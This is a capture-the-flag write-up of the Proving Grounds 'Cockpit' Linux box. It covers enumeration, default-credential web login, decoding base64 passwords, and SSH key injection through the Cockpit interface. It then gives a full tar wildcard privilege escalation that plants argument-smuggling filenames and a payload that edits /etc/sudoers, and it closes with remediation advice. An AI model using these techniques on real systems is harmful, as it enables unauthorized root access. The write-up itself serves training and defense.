Box Overview

Cockpit is a Linux machine from Offensive Security’s Proving Grounds that demonstrates web enumeration, SSH key injection via a web management interface, and sudo privilege escalation through tar wildcard exploitation.

Enumeration

Nmap Scan

sudo nmap -sS -sC -A 192.168.227.10 -T4 -oN first.scan -p-

Open Ports:

  • 22/tcp - SSH (OpenSSH 8.2p1 Ubuntu)
  • 80/tcp - HTTP (Apache 2.4.41)
  • 9090/tcp - SSL/zeus-admin (Web management interface)

Web Enumeration

Port 80 - Apache

Initial inspection revealed a static template website with no obvious vulnerabilities.

Directory Fuzzing

KEYNOTE: Always scan with file extensions!

gobuster dir -u http://192.168.227.10 \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -x php,html,txt

Key Discoveries:

  • /blocked.html - Informational page
  • /login.php - Authentication page ✅
  • /logout.php - Session termination
  • /css/, /js/, /img/ - Static resources

Critical Finding: Without the -x php extension flag, login.php would have been missed!

Initial Access - Web Login

Attempted default credentials on /login.php:

Username: admin
Password: (empty)

Authentication successful! 🎯

Credential Discovery

Found base64-encoded credentials in the web interface:

User: James

echo -n "Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=" | base64 -d
# canttouchhhthiss@455152

User: Cameron

echo -n "dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy" | base64 -d
# thisscanttbetouchedd@455152

SSH Attempt

ssh [email protected]
# Permission denied (publickey)

SSH requires public key authentication - password auth disabled.

Initial Access via Cockpit Management Interface

Port 9090 Analysis

The zeus-admin service on port 9090 is actually Cockpit - a web-based Linux server management tool.

Features discovered:

  • Terminal access
  • Account management
  • SSH key management

SSH Key Injection

Generate SSH Key Pair

ssh-keygen -t ECDSA -f james_ecdsa
# Enter passphrase: (empty)

Generated files:

  • james_ecdsa - Private key
  • james_ecdsa.pub - Public key

Public Key Content

cat james_ecdsa.pub

ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGX7pbw0CAArVga2JsSeQ+Ex4xf4ylNqBDSOx85+A/RWSzhkBQQNUk2rgl7NuzY7Dq4rNT5j6SKfVr1LPTziyDY= kali@kali

Inject via Cockpit

  1. Navigate to Cockpit web interface: https://192.168.227.10:9090
  2. Authenticate with discovered credentials
  3. Go to Accountsjames
  4. Add SSH authorized key
  5. Paste public key content
  6. Save

SSH Access

ssh [email protected] -i james_ecdsa

Shell obtained as james!

james@blaze:~$ cat local.txt
669f9c71e19070836589e6ae17fa3823

Local flag captured!

Privilege Escalation

Sudo Enumeration

sudo -l

Output:

User james may run the following commands on blaze:
    (ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *

Vulnerability: Sudo access to tar with wildcard (*) in /tmp/ directory!

Exploitation Strategy

Reference: GTFOBins - tar

The wildcard allows for tar wildcard injection through checkpoint actions.

Payload Creation

cd /tmp

# Create malicious payload
vim payload.sh

payload.sh:

#!/bin/bash
echo "james ALL=(root) NOPASSWD: ALL" >> /etc/sudoers

Make executable:

chmod +x payload.sh

Wildcard Exploitation

Create files that will be interpreted as tar command-line arguments:

# Create checkpoint trigger
echo "" > '--checkpoint=1'

# Create checkpoint action to execute payload
echo "" > '--checkpoint-action=exec=sh payload.sh'

How it works:

  • The * wildcard expands to include our specially-named files
  • Tar interprets filenames starting with -- as command-line arguments
  • --checkpoint=1 triggers after processing first file
  • --checkpoint-action=exec=sh payload.sh executes our script as root

Execute Exploit

sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *

Tar processes files and executes payload as root!

Verify sudoers modification:

sudo -l

Output:

User james may run the following commands on blaze:
    (root) NOPASSWD: ALL

Root Shell

sudo /bin/bash

root@blaze:/tmp# cat /root/proof.txt
92d0bde76ffc2bddecc04859ff8b92e0

Root flag captured! 🎯

Attack Chain Summary

  1. Web Enumeration → Found /login.php (with -x php flag)
  2. Default Credentials → admin:(empty) provided access
  3. Credential Discovery → Base64-encoded passwords found
  4. Cockpit Interface → Discovered web management tool on port 9090
  5. SSH Key Injection → Added public key via Cockpit account management
  6. SSH Access → Authenticated as james
  7. Sudo Enumeration → Discovered tar with wildcard in /tmp
  8. Tar Wildcard Exploit → Injected sudoers modification
  9. Root Access → Full system compromise

Key Takeaways

Lessons Learned

KEYNOTE: Enumeration is key!

  1. Always use file extensions in directory fuzzing - Without -x php, the critical /login.php endpoint would have been missed
  2. Default credentials are still prevalent - Simple credentials like admin:(empty) still work
  3. Web management interfaces = attack surface - Cockpit’s SSH key management feature enabled persistence
  4. Wildcard exploitation remains effective - Sudo commands with wildcards are dangerous
  5. Read output thoroughly - Pay attention to command outputs for exploitation opportunities

Vulnerabilities Exploited

  1. Weak Authentication - Default credentials on web interface
  2. SSH Key Injection - Unauthorized key addition via web UI
  3. Sudo Misconfiguration - Tar with wildcard expansion
  4. Tar Checkpoint Exploitation - Command injection via checkpoint actions

Remediation

Web Application

  • Enforce strong authentication
  • Implement account lockout policies
  • Require 2FA for administrative functions
  • Audit user actions in web interfaces

SSH Configuration

  • Monitor authorized_keys modifications
  • Implement centralized SSH key management
  • Alert on new key additions
  • Regular key rotation policies

Sudo Configuration

# BAD - Allows wildcard exploitation
james ALL=(ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *

# BETTER - Specific file paths only
james ALL=(ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz /var/www/html
  • Avoid wildcards in sudo commands
  • Use absolute paths
  • Limit command options
  • Regular sudo configuration audits

Tools Used

  • nmap
  • gobuster
  • base64
  • ssh-keygen
  • GTFOBins

Techniques

  • Web directory fuzzing
  • Base64 decoding
  • SSH key generation and injection
  • Sudo enumeration
  • Tar wildcard exploitation
  • GTFOBins reference

Credits

Box Creator: Offensive Security
Platform: Proving Grounds Practice

“Always enumerate with file extensions - you never know what you’ll find!”